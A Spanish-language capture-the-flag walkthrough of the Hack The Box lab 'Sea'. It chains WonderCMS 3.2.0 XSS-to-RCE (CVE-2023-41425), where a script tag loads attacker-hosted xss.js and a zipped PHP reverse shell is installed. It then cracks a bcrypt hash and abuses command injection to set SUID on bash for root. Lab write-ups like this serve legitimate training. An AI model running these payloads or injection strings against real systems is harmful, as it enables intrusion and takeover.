Sea

OS: Linux
Dificultad: Fácil
Puntos: 20

Nmap Scan 

nmap -v -p- --min-rate=5000 10.129.236.229
nmap -p 22,80 -sV -sC -oN nmap.txt 10.129.236.229
Nmap scan report for 10.129.236.229
Host is up (0.028s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
|   256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_  256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeracion

Enumeramos directorios de la aplicacion web.

gobuster dir -u http://10.129.236.229/ -w /usr/share/wordlists/dirb/big.txt -t 20
/0                    (Status: 200) [Size: 3685]
/404                  (Status: 200) [Size: 3376]
/data                 (Status: 301) [Size: 235] [--> http://10.129.236.229/data/]
/home                 (Status: 200) [Size: 3685]
/messages             (Status: 301) [Size: 239] [--> http://10.129.236.229/messages/]
/plugins              (Status: 301) [Size: 238] [--> http://10.129.236.229/plugins/]
/themes               (Status: 301) [Size: 237] [--> http://10.129.236.229/themes/]
gobuster dir -u http://10.129.236.229/themes/ -w /usr/share/wordlists/dirb/big.txt -t 20
/.htaccess            (Status: 403) [Size: 199]
/.htpasswd            (Status: 403) [Size: 199]
/404                  (Status: 200) [Size: 3376]
/Documents and Settings (Status: 403) [Size: 199]
/Program Files        (Status: 403) [Size: 199]
/bike                 (Status: 301) [Size: 242] [--> http://10.129.236.229/themes/bike/]
/contact us           (Status: 403) [Size: 199]
/donate cash          (Status: 403) [Size: 199]
gobuster dir -u http://10.129.236.229/themes/bike/ -w /usr/share/seclists/Fuzzing/fuzz-Bo0oM.txt -t 20
/admin/home           (Status: 200) [Size: 3685]
/LICENSE              (Status: 200) [Size: 1067]
/README.md            (Status: 200) [Size: 318]
/sym/root/home/       (Status: 200) [Size: 3685]
/version              (Status: 200) [Size: 6]

Vemos un archivo README.md que meciona la tecnologia que estan utilizando.

┌──(root㉿kali)-[~/Sea]
└─# curl http://sea.htb/themes/bike/README.md
# WonderCMS bike theme

## Description
Includes animations.

## Author: turboblack

## Preview
![Theme preview](/preview.jpg)

## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.

Al igual que ubicamos la version.

┌──(root㉿kali)-[~/Sea]
└─# curl http://sea.htb/themes/bike/version  
3.2.0

Wonder CMS v.3.2.0 (RCE)

Encontramos el siguiente exploit para obtener RCE.

Para que funcione el script necesitamos realizar algunos cambios.

#var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = "http://sea.htb";
...
...
var urlRev = urlWithoutLogBase+"/?installModule=http://10.10.14.50/shell.zip&directoryName=violet&type=themes&token=" + token;
...
...
xhr4.open("GET", urlWithoutLogBase+"/themes/shell/rev.php");
...
...
xhr5.open("GET", urlWithoutLogBase+"/themes/shell/rev.php?lhost=" + ip + "&lport=" + port); 
...
...
http://sea.htb/index.php?page=loginURL?"></form><script src="http://10.10.14.50/xss.js"></script><form action="
...
...
XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+"/xss.js\"></script><form+action=\""
...
...
os.system("python3 -m http.server 80\n")

Ahora creamos nuestro archivo zip que contendra la reverse shell.

┌──(root㉿kali)-[~/Sea]
└─# mkdir shell
                                                                                                        
┌──(root㉿kali)-[~/Sea]
└─# cp /usr/share/webshells/php/php-reverse-shell.php shell/rev.php

Modificamos nuestra IP en el archivo.

$ip = '10.10.14.50';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

Creamos el zip.

┌──(root㉿kali)-[~/Sea]
└─# zip -r shell.zip shell/
  adding: shell/ (stored 0%)
  adding: shell/rev.php (deflated 59%)

Ejecutamos el script.

python3 exploit.py 'http://sea.htb/loginURL' 10.10.14.50 1234

Enviamos nuestro payload desde el formulario de contacto y en el apartado de website.

http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.50/xss.js"></script><form+action="

Esperamos un momento y obtenemos nuestra reverse shell.

Lateral Movement

Encontramos un hash en la siguiente ruta.

www-data@sea:/var/www/sea/data$ cat database.js 
{
    "config": {
        "siteTitle": "Sea",
        "theme": "bike",
        "defaultPage": "home",
        "login": "loginURL",
        "forceLogout": false,
        "forceHttps": false,
        "saveChangesPopup": false,
        "password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",

Es posible crackearlo pero necesitamos remover los backslash.

$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q

Crackeamos el hash y obtenemos el password.

┌──(root㉿kali)-[~/Sea]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X2])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mychemicalromance (?)     
1g 0:00:00:42 DONE (2024-08-12 08:48) 0.02348g/s 71.86p/s 71.86c/s 71.86C/s chaparra..memories
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Nos conectamos por SSH.

┌──(root㉿kali)-[~/Sea]
└─# ssh amay@sea.htb
amay@sea.htb's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-190-generic x86_64)

Last login: Mon Aug 12 12:50:20 2024 from 10.10.14.50
amay@sea:~$ id
uid=1000(amay) gid=1000(amay) groups=1000(amay)

Privilege Escalation

Vemos el puerto 8080 abierto localmente.

amay@sea:~$ netstat -putona
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name     Timer
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                    off (0.00/0/0)

Hacemos portfoward de es puerto a nuestra maquina.

ssh amay@sea.htb -L 8888:127.0.0.1:8080

Nos saltara un formulario de autenticacion podemos utilizar las mismas credenciales.

amay : mychemicalromance

Probando la aplicacion web encontramos un command injection de la siguiente forma.

log_file=;id;test&analyze_log=

Desde este punto podemos hacer varias cosas, le daremos SUID al binario bash para escalar privilegios.

log_file=;chmod 4777 /bin/bash;test&analyze_log=

Ahora desde la terminal podemos ser root.

amay@sea:~$ /bin/bash -p
bash-5.0# id
uid=1000(amay) gid=1000(amay) euid=0(root) groups=1000(amay)
bash-5.0# cat /root/root.txt
3e050709de4f9b9c0c5affc3e5901a23
bash-5.0#

Referencias

https://github.com/prodigiousMind/CVE-2023-41425